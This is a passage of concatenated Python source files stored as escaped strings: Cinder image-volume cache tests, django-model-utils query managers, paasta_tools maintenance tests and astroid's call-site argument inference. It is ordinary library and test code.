msg[\'event_type\'])\n self.assertEqual(\'INFO\', 
msg[\'priority\'])\n self.assertEqual(entry[\'host\'], msg[\'payload\'][\'host\'])\n self.assertEqual(entry[\'image_id\'], msg[\'payload\'][\'image_id\'])\n self.assertEqual(1, len(self.notifier.notifications))\n\n def test_get_entry_not_exists(self):\n cache = self._build_cache()\n image_meta = {\n \'is_public\': True,\n \'owner\': \'70a599e0-31e7-49b7-b260-868f441e862b\',\n \'properties\': {\n \'virtual_size\': \'1.7\'\n },\n \'updated_at\': timeutils.utcnow(with_timezone=True)\n }\n image_id = \'PI:KEY\'\n (self.mock_db.\n image_volume_cache_get_and_update_last_used.return_value) = None\n\n found_entry = cache.get_entry(self.context,\n self.volume_ovo,\n image_id,\n image_meta)\n\n self.assertIsNone(found_entry)\n\n msg = self.notifier.notifications[0]\n self.assertEqual(\'image_volume_cache.miss\', msg[\'event_type\'])\n self.assertEqual(\'INFO\', msg[\'priority\'])\n self.assertEqual(self.volume.host, msg[\'payload\'][\'host\'])\n self.assertEqual(image_id, msg[\'payload\'][\'image_id\'])\n self.assertEqual(1, len(self.notifier.notifications))\n\n @mock.patch(\'cinder.objects.Volume.get_by_id\')\n def test_get_entry_needs_update(self, mock_volume_by_id):\n cache = self._build_cache()\n entry = self._build_entry()\n image_meta = {\n \'is_public\': True,\n \'owner\': \'70a599e0-31e7-49b7-b260-868f441e862b\',\n \'properties\': {\n \'virtual_size\': \'1.7\'\n },\n \'updated_at\': entry[\'image_updated_at\'] + timedelta(hours=2)\n }\n (self.mock_db.\n image_volume_cache_get_and_update_last_used.return_value) = entry\n\n mock_volume = mock.MagicMock()\n mock_volume_by_id.return_value = mock_volume\n\n found_entry = cache.get_entry(self.context,\n self.volume_ovo,\n entry[\'image_id\'],\n image_meta)\n\n # Expect that the cache entry is not returned and the image-volume\n # for it is deleted.\n self.assertIsNone(found_entry)\n self.mock_volume_api.delete.assert_called_with(self.context,\n mock_volume)\n msg = self.notifier.notifications[0]\n self.assertEqual(\'image_volume_cache.miss\', msg[\'event_type\'])\n self.assertEqual(\'INFO\', msg[\'priority\'])\n self.assertEqual(self.volume.host, msg[\'payload\'][\'host\'])\n self.assertEqual(entry[\'image_id\'], msg[\'payload\'][\'image_id\'])\n self.assertEqual(1, len(self.notifier.notifications))\n\n def test_create_cache_entry(self):\n cache = self._build_cache()\n entry = self._build_entry()\n image_meta = {\n \'updated_at\': entry[\'image_updated_at\']\n }\n self.mock_db.image_volume_cache_create.return_value = entry\n created_entry = cache.create_cache_entry(self.context,\n self.volume_ovo,\n entry[\'image_id\'],\n image_meta)\n self.assertEqual(entry, created_entry)\n self.mock_db.image_volume_cache_create.assert_called_once_with(\n self.context,\n self.volume_ovo.host,\n self.volume_ovo.cluster_name,\n entry[\'image_id\'],\n entry[\'image_updated_at\'].replace(tzinfo=None),\n self.volume_ovo.id,\n self.volume_ovo.size\n )\n\n def test_ensure_space_unlimited(self):\n cache = self._build_cache(max_gb=0, max_count=0)\n has_space = cache.ensure_space(self.context, self.volume)\n self.assertTrue(has_space)\n\n self.volume.size = 500\n has_space = cache.ensure_space(self.context, self.volume)\n self.assertTrue(has_space)\n\n def test_ensure_space_no_entries(self):\n cache = self._build_cache(max_gb=100, max_count=10)\n self.mock_db.image_volume_cache_get_all.return_value = []\n\n self.volume_ovo.size = 5\n has_space = cache.ensure_space(self.context, self.volume_ovo)\n self.assertTrue(has_space)\n\n self.volume_ovo.size = 101\n has_space = 
cache.ensure_space(self.context, self.volume_ovo)\n self.assertFalse(has_space)\n\n def test_ensure_space_need_gb(self):\n cache = self._build_cache(max_gb=30, max_count=10)\n mock_delete = mock.patch.object(cache, \'_delete_image_volume\').start()\n\n entries = []\n entry1 = self._build_entry(size=12)\n entries.append(entry1)\n entry2 = self._build_entry(size=5)\n entries.append(entry2)\n entry3 = self._build_entry(size=10)\n entries.append(entry3)\n self.mock_db.image_volume_cache_get_all.return_value = entries\n\n self.volume_ovo.size = 15\n has_space = cache.ensure_space(self.context, self.volume_ovo)\n self.assertTrue(has_space)\n self.assertEqual(2, mock_delete.call_count)\n mock_delete.assert_any_call(self.context, entry2)\n mock_delete.assert_any_call(self.context, entry3)\n\n def test_ensure_space_need_count(self):\n cache = self._build_cache(max_gb=30, max_count=2)\n mock_delete = mock.patch.object(cache, \'_delete_image_volume\').start()\n\n entries = []\n entry1 = self._build_entry(size=10)\n entries.append(entry1)\n entry2 = self._build_entry(size=5)\n entries.append(entry2)\n self.mock_db.image_volume_cache_get_all.return_value = entries\n\n self.volume_ovo.size = 12\n has_space = cache.ensure_space(self.context, self.volume_ovo)\n self.assertTrue(has_space)\n self.assertEqual(1, mock_delete.call_count)\n mock_delete.assert_any_call(self.context, entry2)\n\n def test_ensure_space_need_gb_and_count(self):\n cache = self._build_cache(max_gb=30, max_count=3)\n mock_delete = mock.patch.object(cache, \'_delete_image_volume\').start()\n\n entries = []\n entry1 = self._build_entry(size=10)\n entries.append(entry1)\n entry2 = self._build_entry(size=5)\n entries.append(entry2)\n entry3 = self._build_entry(size=12)\n entries.append(entry3)\n self.mock_db.image_volume_cache_get_all.return_value = entries\n\n self.volume_ovo.size = 16\n has_space = cache.ensure_space(self.context, self.volume_ovo)\n self.assertTrue(has_space)\n self.assertEqual(2, mock_delete.call_count)\n mock_delete.assert_any_call(self.context, entry2)\n mock_delete.assert_any_call(self.context, entry3)\n\n def test_ensure_space_cant_free_enough_gb(self):\n cache = self._build_cache(max_gb=30, max_count=10)\n mock_delete = mock.patch.object(cache, \'_delete_image_volume\').start()\n\n entries = list(self._build_entry(size=25))\n self.mock_db.image_volume_cache_get_all.return_value = entries\n\n self.volume_ovo.size = 50\n has_space = cache.ensure_space(self.context, self.volume_ovo)\n self.assertFalse(has_space)\n mock_delete.assert_not_called()\n', 'from types import ClassType\nimport warnings\n\nfrom django.contrib.contenttypes.models import ContentType\nfrom django.db import models\nfrom django.db.models.fields.related import OneToOneField\nfrom django.db.models.manager import Manager\nfrom django.db.models.query import QuerySet\n\nimport django\n\nclass InheritanceQuerySet(QuerySet):\n def select_subclasses(self, *subclasses):\n if not subclasses:\n subclasses = [rel.var_name for rel in self.model._meta.get_all_related_objects()\n if isinstance(rel.field, OneToOneField)\n and issubclass(rel.field.model, self.model)]\n new_qs = self.select_related(*subclasses)\n new_qs.subclasses = subclasses\n return new_qs\n\n def _clone(self, klass=None, setup=False, **kwargs):\n for name in [\'subclasses\', \'_annotated\']:\n if hasattr(self, name):\n kwargs[name] = getattr(self, name)\n return super(InheritanceQuerySet, self)._clone(klass, setup, **kwargs)\n\n def annotate(self, *args, **kwargs):\n qset = 
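# A stand-alone sketch of the LRU eviction policy the ensure_space tests
# above describe: drop least-recently-used entries until both the GB and
# count limits can absorb the incoming volume. This is an illustration
# under assumed semantics, not cinder's actual implementation. One detail
# worth flagging: in test_ensure_space_cant_free_enough_gb,
# list(self._build_entry(size=25)) iterates the entry dict and yields its
# keys; a one-element list, [self._build_entry(size=25)], is presumably
# what is meant.
def plan_evictions(entries, incoming_size, max_gb, max_count):
    """Return entries to evict (oldest first), or None if it can never fit."""
    if max_gb and incoming_size > max_gb:
        return None
    pool = sorted(entries, key=lambda e: e['last_used'])  # LRU first
    used_gb = sum(e['size'] for e in pool)
    count = len(pool)
    victims = []
    while pool and ((max_gb and used_gb + incoming_size > max_gb) or
                    (max_count and count + 1 > max_count)):
        victim = pool.pop(0)
        victims.append(victim)
        used_gb -= victim['size']
        count -= 1
    return victims

entries = [{'size': 12, 'last_used': 1},
           {'size': 5, 'last_used': 2},
           {'size': 10, 'last_used': 3}]
assert plan_evictions(entries, 15, max_gb=30, max_count=10) == [entries[0]]
assert plan_evictions(entries, 50, max_gb=30, max_count=10) is None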
super(InheritanceQuerySet, self).annotate(*args, **kwargs)\n qset._annotated = [a.default_alias for a in args] + kwargs.keys()\n return qset\n\n def get_subclass(self, obj):\n """"""\n FIX see https://bitbucket.PI:KEY\n and https://bitbucket.org/carljm/django-model-utils/issue/15/mti-problem-with-select_subclasses\n """"""\n def get_attribute(obj, s):\n try:\n return getattr(obj,s, False)\n except obj.__class__.DoesNotExist:\n return False\n \n if django.VERSION[0:2] < (1, 5):\n sub_obj = [getattr(obj, s) for s in self.subclasses if getattr(obj, s)] or [obj]\n else:\n sub_obj = [getattr(obj, s) for s in self.subclasses if get_attribute(obj, s)] or [obj]\n return sub_obj[0]\n\n def iterator(self):\n iter = super(InheritanceQuerySet, self).iterator()\n if getattr(self, \'subclasses\', False):\n for obj in iter:\n sub_obj = self.get_subclass(obj)\n if getattr(self, \'_annotated\', False):\n for k in self._annotated:\n setattr(sub_obj, k, getattr(obj, k))\n\n yield sub_obj\n else:\n for obj in iter:\n yield obj\n\n\nclass InheritanceManager(models.Manager):\n use_for_related_fields = True\n\n def get_query_set(self):\n return InheritanceQuerySet(self.model)\n\n def select_subclasses(self, *subclasses):\n return self.get_query_set().select_subclasses(*subclasses)\n\n def get_subclass(self, *args, **kwargs):\n return self.get_query_set().select_subclasses().get(*args, **kwargs)\n\n\nclass InheritanceCastMixin(object):\n def cast(self):\n results = tuple(self.values_list(\'pk\', \'real_type\'))\n type_to_pks = {}\n for pk, real_type_id in results:\n type_to_pks.setdefault(real_type_id, []).append(pk)\n content_types = ContentType.objects.in_bulk(type_to_pks.keys())\n pk_to_child = {}\n for real_type_id, pks in type_to_pks.iteritems():\n content_type = content_types[real_type_id]\n child_type = content_type.model_class()\n children = child_type._default_manager.in_bulk(pks)\n for pk, child in children.iteritems():\n pk_to_child[pk] = child\n children = []\n # sort children into same order as parents where returned\n for pk, real_type_id in results:\n children.append(pk_to_child[pk])\n return children\n\n\nclass QueryManager(models.Manager):\n def __init__(self, *args, **kwargs):\n if args:\n self._q = args[0]\n else:\n self._q = models.Q(**kwargs)\n super(QueryManager, self).__init__()\n\n def order_by(self, *args):\n self._order_by = args\n return self\n\n def get_query_set(self):\n qs = super(QueryManager, self).get_query_set().filter(self._q)\n if hasattr(self, \'_order_by\'):\n return qs.order_by(*self._order_by)\n return qs\n\n\nclass PassThroughManager(models.Manager):\n """"""\n Inherit from this Manager to enable you to call any methods from your\n custom QuerySet class from your manager. 
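# Usage sketch for the InheritanceManager above, assuming a hypothetical
# Place/Restaurant pair in a Django 1.x project (the manager targets the
# old get_query_set() API). The ORM calls are left as comments because
# they need a configured Django settings module to actually run.
from django.db import models

class Place(models.Model):
    name = models.CharField(max_length=50)
    objects = InheritanceManager()

class Restaurant(Place):
    serves_pizza = models.BooleanField(default=False)

# Place.objects.all()                -> every row as a plain Place
# Place.objects.select_subclasses()  -> Restaurant rows downcast to Restaurant
# Place.objects.get_subclass(pk=1)   -> a single object, downcast if possible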
Simply define your QuerySet\n class, and return an instance of it from your manager\'s `get_query_set`\n method.\n\n Alternately, if you don\'t need any extra methods on your manager that\n aren\'t on your QuerySet, then just pass your QuerySet class to the\n ``for_queryset_class`` class method.\n\n class PostQuerySet(QuerySet):\n def enabled(self):\n return self.filter(disabled=False)\n\n class Post(models.Model):\n objects = PassThroughManager.for_queryset_class(PostQuerySet)()\n\n """"""\n # pickling causes recursion errors\n _deny_methods = [\'__getstate__\', \'__setstate__\', \'_db\']\n\n def __init__(self, queryset_cls=None):\n self._queryset_cls = queryset_cls\n super(PassThroughManager, self).__init__()\n\n def __getattr__(self, name):\n if name in self._deny_methods:\n raise AttributeError(name)\n return getattr(self.get_query_set(), name)\n\n def get_query_set(self):\n if self._queryset_cls is not None:\n kargs = {\'model\': self.model}\n if hasattr(self, \'_db\'):\n kargs[\'using\'] = self._db\n return self._queryset_cls(**kargs)\n return super(PassThroughManager, self).get_query_set()\n\n @classmethod\n def for_queryset_class(cls, queryset_cls):\n class _PassThroughManager(cls):\n def __init__(self):\n return super(_PassThroughManager, self).__init__()\n\n def get_query_set(self):\n kwargs = {}\n if hasattr(self, ""_db""):\n kwargs[""using""] = self._db\n return queryset_cls(self.model, **kwargs)\n\n return _PassThroughManager\n\n\ndef manager_from(*mixins, **kwds):\n """"""\n Returns a Manager instance with extra methods, also available and\n chainable on generated querysets.\n\n (By George Sakkis, originally posted at\n http://djangosnippets.org/snippets/2117/)\n\n :param mixins: Each ``mixin`` can be either a class or a function. The\n generated manager and associated queryset subclasses extend the mixin\n classes and include the mixin functions (as methods).\n\n :keyword queryset_cls: The base queryset class to extend from\n (``django.db.models.query.QuerySet`` by default).\n\n :keyword manager_cls: The base manager class to extend from\n (``django.db.models.manager.Manager`` by default).\n\n """"""\n warnings.warn(\n ""manager_from is pending deprecation; use PassThroughManager instead."",\n PendingDeprecationWarning,\n stacklevel=2)\n # collect separately the mixin classes and methods\n bases = [kwds.get(\'queryset_cls\', QuerySet)]\n methods = {}\n for mixin in mixins:\n if isinstance(mixin, (ClassType, type)):\n bases.append(mixin)\n else:\n try: methods[mixin.__name__] = mixin\n except AttributeError:\n raise TypeError(\'Mixin must be class or function, not %s\' %\n mixin.__class__)\n # create the QuerySet subclass\n id = hash(mixins + tuple(kwds.iteritems()))\n new_queryset_cls = type(\'Queryset_%d\' % id, tuple(bases), methods)\n # create the Manager subclass\n bases[0] = manager_cls = kwds.get(\'manager_cls\', Manager)\n new_manager_cls = type(\'Manager_%d\' % id, tuple(bases), methods)\n # and finally override new manager\'s get_query_set\n super_get_query_set = manager_cls.get_query_set\n def get_query_set(self):\n # first honor the super manager\'s get_query_set\n qs = super_get_query_set(self)\n # and then try to bless the returned queryset by reassigning it to the\n # newly created Queryset class, though this may not be feasible\n if not issubclass(new_queryset_cls, qs.__class__):\n raise TypeError(\'QuerySet subclass conflict: cannot determine a \'\n \'unique class for queryset instance\')\n qs.__class__ = new_queryset_cls\n return qs\n 
new_manager_cls.get_query_set = get_query_set\n return new_manager_cls()\n', '# Copyright 2015-2016 Yelp Inc.\n#\n# Licensed under the Apache License, Version 2.0 (the ""License"");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an ""AS IS"" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\nimport mock\n\nfrom paasta_tools import paasta_maintenance\n\n\n@mock.patch(""paasta_tools.mesos_maintenance.is_host_drained"", autospec=True)\n@mock.patch(\n ""paasta_tools.mesos_maintenance.get_hosts_past_maintenance_start"", autospec=True\n)\ndef test_is_safe_to_kill(mock_get_hosts_past_maintenance_start, mock_is_host_drained):\n mock_is_host_drained.return_value = False\n mock_get_hosts_past_maintenance_start.return_value = []\n assert not paasta_maintenance.is_safe_to_kill(""blah"")\n\n mock_is_host_drained.return_value = False\n mock_get_hosts_past_maintenance_start.return_value = [""blah""]\n assert paasta_maintenance.is_safe_to_kill(""blah"")\n\n mock_is_host_drained.return_value = True\n mock_get_hosts_past_maintenance_start.return_value = [""blah""]\n assert paasta_maintenance.is_safe_to_kill(""blah"")\n\n mock_is_host_drained.return_value = True\n mock_get_hosts_past_maintenance_start.return_value = []\n assert paasta_maintenance.is_safe_to_kill(""blah"")\n\n\n@mock.patch(""paasta_tools.paasta_maintenance.is_hostname_local"", autospec=True)\ndef test_is_safe_to_drain_rejects_non_localhosts(mock_is_hostname_local,):\n mock_is_hostname_local.return_value = False\n assert paasta_maintenance.is_safe_to_drain(""non-localhost"") is False\n\n\n@mock.patch(""paasta_tools.paasta_maintenance.getfqdn"", autospec=True)\n@mock.patch(""paasta_tools.paasta_maintenance.gethostname"", autospec=True)\ndef test_is_hostname_local_works(mock_gethostname, mock_getfqdn):\n mock_gethostname.return_value = ""foo""\n mock_getfqdn.return_value = ""foo.bar""\n assert paasta_maintenance.is_hostname_local(""localhost"") is True\n assert paasta_maintenance.is_hostname_local(""foo"") is True\n assert paasta_maintenance.is_hostname_local(""foo.bar"") is True\n assert paasta_maintenance.is_hostname_local(""something_different"") is False\n\n\n@mock.patch(\n ""paasta_tools.paasta_maintenance.utils.load_system_paasta_config"", autospec=True\n)\ndef test_are_local_tasks_in_danger_fails_safe_with_false(\n mock_load_system_paasta_config,\n):\n """"""If something unexpected happens that we don\'t know how to\n interpret, we make sure that we fail with ""False"" so that processes\n move on and don\'t deadlock. 
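# The fail-safe behaviour the surrounding test pins down, reduced to a
# stand-alone sketch: when a health check blows up for any reason, answer
# the safe default so drains cannot deadlock. fail_safe is a hypothetical
# helper for illustration, not part of paasta_tools.
def fail_safe(fn, default=False):
    def wrapped(*args, **kwargs):
        try:
            return fn(*args, **kwargs)
        except Exception:
            # If we don't know how to interpret the failure, move on.
            return default
    return wrapped

@fail_safe
def are_local_tasks_in_danger():
    raise Exception('cannot load system paasta config')

assert are_local_tasks_in_danger() is False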
In general the answer to ""is it safe to drain""\n is ""yes"" if mesos can\'t be reached, etc""""""\n mock_load_system_paasta_config.side_effect = Exception\n assert paasta_maintenance.are_local_tasks_in_danger() is False\n\n\n@mock.patch(\n ""paasta_tools.paasta_maintenance.utils.load_system_paasta_config"", autospec=True\n)\n@mock.patch(\n ""paasta_tools.paasta_maintenance.marathon_services_running_here"", autospec=True\n)\ndef test_are_local_tasks_in_danger_is_false_with_nothing_running(\n mock_marathon_services_running_here, mock_load_system_paasta_config\n):\n mock_marathon_services_running_here.return_value = []\n assert paasta_maintenance.are_local_tasks_in_danger() is False\n\n\n@mock.patch(\n ""paasta_tools.paasta_maintenance.utils.load_system_paasta_config"", autospec=True\n)\n@mock.patch(\n ""paasta_tools.paasta_maintenance.marathon_services_running_here"", autospec=True\n)\n@mock.patch(""paasta_tools.paasta_maintenance.get_backends"", autospec=True)\n@mock.patch(""paasta_tools.paasta_maintenance.is_healthy_in_haproxy"", autospec=True)\ndef test_are_local_tasks_in_danger_is_false_with_an_unhealthy_service(\n mock_is_healthy_in_haproxy,\n mock_get_backends,\n mock_marathon_services_running_here,\n mock_load_system_paasta_config,\n):\n mock_is_healthy_in_haproxy.return_value = False\n mock_marathon_services_running_here.return_value = [(""service"", ""instance"", 42)]\n assert paasta_maintenance.are_local_tasks_in_danger() is False\n mock_is_healthy_in_haproxy.assert_called_once_with(42, mock.ANY)\n\n\n@mock.patch(\n ""paasta_tools.paasta_maintenance.utils.load_system_paasta_config"", autospec=True\n)\n@mock.patch(\n ""paasta_tools.paasta_maintenance.marathon_services_running_here"", autospec=True\n)\n@mock.patch(""paasta_tools.paasta_maintenance.get_backends"", autospec=True)\n@mock.patch(""paasta_tools.paasta_maintenance.is_healthy_in_haproxy"", autospec=True)\n@mock.patch(""paasta_tools.paasta_maintenance.synapse_replication_is_low"", autospec=True)\ndef test_are_local_tasks_in_danger_is_true_with_an_healthy_service_in_danger(\n mock_synapse_replication_is_low,\n mock_is_healthy_in_haproxy,\n mock_get_backends,\n mock_marathon_services_running_here,\n mock_load_system_paasta_config,\n):\n mock_is_healthy_in_haproxy.return_value = True\n mock_synapse_replication_is_low.return_value = True\n mock_marathon_services_running_here.return_value = [(""service"", ""instance"", 42)]\n assert paasta_maintenance.are_local_tasks_in_danger() is True\n mock_is_healthy_in_haproxy.assert_called_once_with(42, mock.ANY)\n assert mock_synapse_replication_is_low.call_count == 1\n\n\n@mock.patch(\n ""paasta_tools.paasta_maintenance.load_marathon_service_config"", autospec=True\n)\n@mock.patch(\n ""paasta_tools.paasta_maintenance.load_smartstack_info_for_service"", autospec=True\n)\n@mock.patch(\n ""paasta_tools.paasta_maintenance.get_expected_instance_count_for_namespace"",\n autospec=True,\n)\n@mock.patch(\n ""paasta_tools.paasta_maintenance.get_replication_for_services"", autospec=True\n)\ndef test_synapse_replication_is_low_understands_underreplicated_services(\n mock_get_replication_for_services,\n mock_get_expected_instance_count_for_namespace,\n mock_load_smartstack_info_for_service,\n mock_load_marathon_service_config,\n):\n mock_load_marathon_service_config.return_value.get_registrations.return_value = (\n ""service.main""\n )\n mock_get_expected_instance_count_for_namespace.return_value = 3\n mock_load_smartstack_info_for_service.return_value = {\n ""local_region"": {""service.main"": 
""up""}\n }\n mock_get_replication_for_services.return_value = {""service.main"": 1}\n local_backends = [""foo""]\n system_paasta_config = mock.MagicMock()\n assert (\n paasta_maintenance.synapse_replication_is_low(\n service=""service"",\n instance=""instance"",\n system_paasta_config=system_paasta_config,\n local_backends=local_backends,\n )\n is True\n )\n\n\n@mock.patch(""paasta_tools.paasta_maintenance.gethostbyname"", autospec=True)\ndef test_is_healthy_in_harproxy_healthy_path(mock_gethostbyname,):\n mock_gethostbyname.return_value = ""127.0.0.1""\n local_port = 42\n backends = [\n {""status"": ""UP"", ""pxname"": ""service.main"", ""svname"": ""127.0.0.1:42_hostname""}\n ]\n assert (\n paasta_maintenance.is_healthy_in_haproxy(\n local_port=local_port, backends=backends\n )\n is True\n )\n\n\n@mock.patch(""paasta_tools.paasta_maintenance.gethostbyname"", autospec=True)\ndef test_is_healthy_in_haproxy_unhealthy_path(mock_gethostbyname,):\n mock_gethostbyname.return_value = ""127.0.0.1""\n local_port = 42\n backends = [\n {""status"": ""DOWN"", ""pxname"": ""service.main"", ""svname"": ""127.0.0.1:42_hostname""}\n ]\n assert (\n paasta_maintenance.is_healthy_in_haproxy(\n local_port=local_port, backends=backends\n )\n is False\n )\n\n\n@mock.patch(""paasta_tools.paasta_maintenance.gethostbyname"", autospec=True)\ndef test_is_healthy_in_haproxy_missing_backend_entirely(mock_gethostbyname,):\n mock_gethostbyname.return_value = ""127.0.0.1""\n local_port = 42\n backends = [\n {\n ""status"": ""DOWN"",\n ""pxname"": ""service.main"",\n ""svname"": ""127.0.0.1:666_otherhostname"",\n }\n ]\n assert (\n paasta_maintenance.is_healthy_in_haproxy(\n local_port=local_port, backends=backends\n )\n is False\n )\n', '# Copyright (c) 2015-2016, 2018-2020 Claudiu Popa dummy@email.com\n# Copyright (c) 2015-2016 Ceridwen dummy@email.com\n# Copyright (c) 2018 Bryce Guinta dummy@email.com\n# Copyright (c) 2018 Nick Drozd dummy@email.com\n# Copyright (c) 2018 Anthony Sottile dummy@email.com\n# Copyright (c) 2020 hippo91 dummy@email.com\n# Copyright (c) 2021 Pierre Sassoulas dummy@email.com\n\n# Licensed under the LGPL: https://www.gnu.org/licenses/old-licenses/lgpl-2.1.en.html\n# For details: https://github.com/PyCQA/astroid/blob/master/LICENSE\n\n\nfrom astroid import bases\nfrom astroid import context as contextmod\nfrom astroid import exceptions, nodes, util\n\n\nclass CallSite:\n """"""Class for understanding arguments passed into a call site\n\n It needs a call context, which contains the arguments and the\n keyword arguments that were passed into a given call site.\n In order to infer what an argument represents, call :meth:`infer_argument`\n with the corresponding function node and the argument name.\n\n :param callcontext:\n An instance of :class:`astroid.context.CallContext`, that holds\n the arguments for the call site.\n :param argument_context_map:\n Additional contexts per node, passed in from :attr:`astroid.context.Context.extra_context`\n :param context:\n An instance of :class:`astroid.context.Context`.\n """"""\n\n def __init__(self, callcontext, argument_context_map=None, context=None):\n if argument_context_map is None:\n argument_context_map = {}\n self.argument_context_map = argument_context_map\n args = callcontext.args\n keywords = callcontext.keywords\n self.duplicated_keywords = set()\n self._unpacked_args = self._unpack_args(args, context=context)\n self._unpacked_kwargs = self._unpack_keywords(keywords, context=context)\n\n self.positional_arguments = [\n arg for arg in 
self._unpacked_args if arg is not util.Uninferable\n ]\n self.keyword_arguments = {\n key: value\n for key, value in self._unpacked_kwargs.items()\n if value is not util.Uninferable\n }\n\n @classmethod\n def from_call(cls, call_node, context=None):\n """"""Get a CallSite object from the given Call node.\n\n :param context:\n An instance of :class:`astroid.context.Context` that will be used\n to force a single inference path.\n """"""\n\n # Determine the callcontext from the given `context` object if any.\n context = context or contextmod.InferenceContext()\n callcontext = contextmod.CallContext(call_node.args, call_node.keywords)\n return cls(callcontext, context=context)\n\n def has_invalid_arguments(self):\n """"""Check if in the current CallSite were passed *invalid* arguments\n\n This can mean multiple things. For instance, if an unpacking\n of an invalid object was passed, then this method will return True.\n Other cases can be when the arguments can\'t be inferred by astroid,\n for example, by passing objects which aren\'t known statically.\n """"""\n return len(self.positional_arguments) != len(self._unpacked_args)\n\n def has_invalid_keywords(self):\n """"""Check if in the current CallSite were passed *invalid* keyword arguments\n\n For instance, unpacking a dictionary with integer keys is invalid\n (**{1:2}), because the keys must be strings, which will make this\n method to return True. Other cases where this might return True if\n objects which can\'t be inferred were passed.\n """"""\n return len(self.keyword_arguments) != len(self._unpacked_kwargs)\n\n def _unpack_keywords(self, keywords, context=None):\n values = {}\n context = context or contextmod.InferenceContext()\n context.extra_context = self.argument_context_map\n for name, value in keywords:\n if name is None:\n # Then it\'s an unpacking operation (**)\n try:\n inferred = next(value.infer(context=context))\n except exceptions.InferenceError:\n values[name] = util.Uninferable\n continue\n\n if not isinstance(inferred, nodes.Dict):\n # Not something we can work with.\n values[name] = util.Uninferable\n continue\n\n for dict_key, dict_value in inferred.items:\n try:\n dict_key = next(dict_key.infer(context=context))\n except exceptions.InferenceError:\n values[name] = util.Uninferable\n continue\n if not isinstance(dict_key, nodes.Const):\n values[name] = util.Uninferable\n continue\n if not isinstance(dict_key.value, str):\n values[name] = util.Uninferable\n continue\n if dict_key.value in values:\n # The name is already in the dictionary\n values[dict_key.value] = util.Uninferable\n self.duplicated_keywords.add(dict_key.value)\n continue\n values[dict_key.value] = dict_value\n else:\n values[name] = value\n return values\n\n def _unpack_args(self, args, context=None):\n values = []\n context = context or contextmod.InferenceContext()\n context.extra_context = self.argument_context_map\n for arg in args:\n if isinstance(arg, nodes.Starred):\n try:\n inferred = next(arg.value.infer(context=context))\n except exceptions.InferenceError:\n values.append(util.Uninferable)\n continue\n\n if inferred is util.Uninferable:\n values.append(util.Uninferable)\n continue\n if not hasattr(inferred, ""elts""):\n values.append(util.Uninferable)\n continue\n values.extend(inferred.elts)\n else:\n values.append(arg)\n return values\n\n def infer_argument(self, funcnode, name, context):\n """"""infer a function argument value according to the call context\n\n Arguments:\n funcnode: The function being called.\n name: The name of the 
argument whose value is being inferred.\n context: Inference context object\n """"""\n if name in self.duplicated_keywords:\n raise exceptions.InferenceError(\n ""The arguments passed to {func!r} "" "" have duplicate keywords."",\n call_site=self,\n func=funcnode,\n arg=name,\n context=context,\n )\n\n # Look into the keywords first, maybe it\'s already there.\n try:\n return self.keyword_arguments[name].infer(context)\n except KeyError:\n pass\n\n # Too many arguments given and no variable arguments.\n if len(self.positional_arguments) > len(funcnode.args.args):\n if not funcnode.args.vararg and not funcnode.args.posonlyargs:\n raise exceptions.InferenceError(\n ""Too many positional arguments ""\n ""passed to {func!r} that does ""\n ""not have *args."",\n call_site=self,\n func=funcnode,\n arg=name,\n context=context,\n )\n\n positional = self.positional_arguments[: len(funcnode.args.args)]\n vararg = self.positional_arguments[len(funcnode.args.args) :]\n argindex = funcnode.args.find_argname(name)[0]\n kwonlyargs = {arg.name for arg in funcnode.args.kwonlyargs}\n kwargs = {\n key: value\n for key, value in self.keyword_arguments.items()\n if key not in kwonlyargs\n }\n # If there are too few positionals compared to\n # what the function expects to receive, check to see\n # if the missing positional arguments were passed\n # as keyword arguments and if so, place them into the\n # positional args list.\n if len(positional) < len(funcnode.args.args):\n for func_arg in funcnode.args.args:\n if func_arg.name in kwargs:\n arg = kwargs.pop(func_arg.name)\n positional.append(arg)\n\n if argindex is not None:\n # 2. first argument of instance/class method\n if argindex == 0 and funcnode.type in (""method"", ""classmethod""):\n if context.boundnode is not None:\n boundnode = context.boundnode\n else:\n # XXX can do better ?\n boundnode = funcnode.parent.frame()\n\n if isinstance(boundnode, nodes.ClassDef):\n # Verify that we\'re accessing a method\n # of the metaclass through a class, as in\n # `cls.metaclass_method`. In this case, the\n # first argument is always the class.\n method_scope = funcnode.parent.scope()\n if method_scope is boundnode.metaclass():\n return iter((boundnode,))\n\n if funcnode.type == ""method"":\n if not isinstance(boundnode, bases.Instance):\n boundnode = boundnode.instantiate_class()\n return iter((boundnode,))\n if funcnode.type == ""classmethod"":\n return iter((boundnode,))\n # if we have a method, extract one position\n # from the index, so we\'ll take in account\n # the extra parameter represented by `self` or `cls`\n if funcnode.type in (""method"", ""classmethod""):\n argindex -= 1\n # 2. 
search arg index\n try:\n return self.positional_arguments[argindex].infer(context)\n except IndexError:\n pass\n\n if funcnode.args.kwarg == name:\n # It wants all the keywords that were passed into\n # the call site.\n if self.has_invalid_keywords():\n raise exceptions.InferenceError(\n ""Inference failed to find values for all keyword arguments ""\n ""to {func!r}: {unpacked_kwargs!r} doesn\'t correspond to ""\n ""{keyword_arguments!r}."",\n keyword_arguments=self.keyword_arguments,\n unpacked_kwargs=self._unpacked_kwargs,\n call_site=self,\n func=funcnode,\n arg=name,\n context=context,\n )\n kwarg = nodes.Dict(\n lineno=funcnode.args.lineno,\n col_offset=funcnode.args.col_offset,\n parent=funcnode.args,\n )\n kwarg.postinit(\n [(nodes.const_factory(key), value) for key, value in kwargs.items()]\n )\n return iter((kwarg,))\n if funcnode.args.vararg == name:\n # It wants all the args that were passed into\n # the call site.\n if self.has_invalid_arguments():\n raise exceptions.InferenceError(\n ""Inference failed to find values for all positional ""\n ""arguments to {func!r}: {unpacked_args!r} doesn\'t ""\n ""correspond to {positional_arguments!r}."",\n positional_arguments=self.positional_arguments,\n unpacked_args=self._unpacked_args,\n call_site=self,\n func=funcnode,\n arg=name,\n context=context,\n )\n args = nodes.Tuple(\n lineno=funcnode.args.lineno,\n col_offset=funcnode.args.col_offset,\n parent=funcnode.args,\n )\n args.postinit(vararg)\n return iter((args,))\n\n # Check if it\'s a default parameter.\n try:\n return funcnode.args.default_value(name).infer(context)\n except exceptions.NoDefault:\n pass\n raise exceptions.InferenceError(\n ""No value found for argument {arg} to {func!r}"",\n call_site=self,\n func=funcnode,\n arg=name,\n context=context,\n )\n', 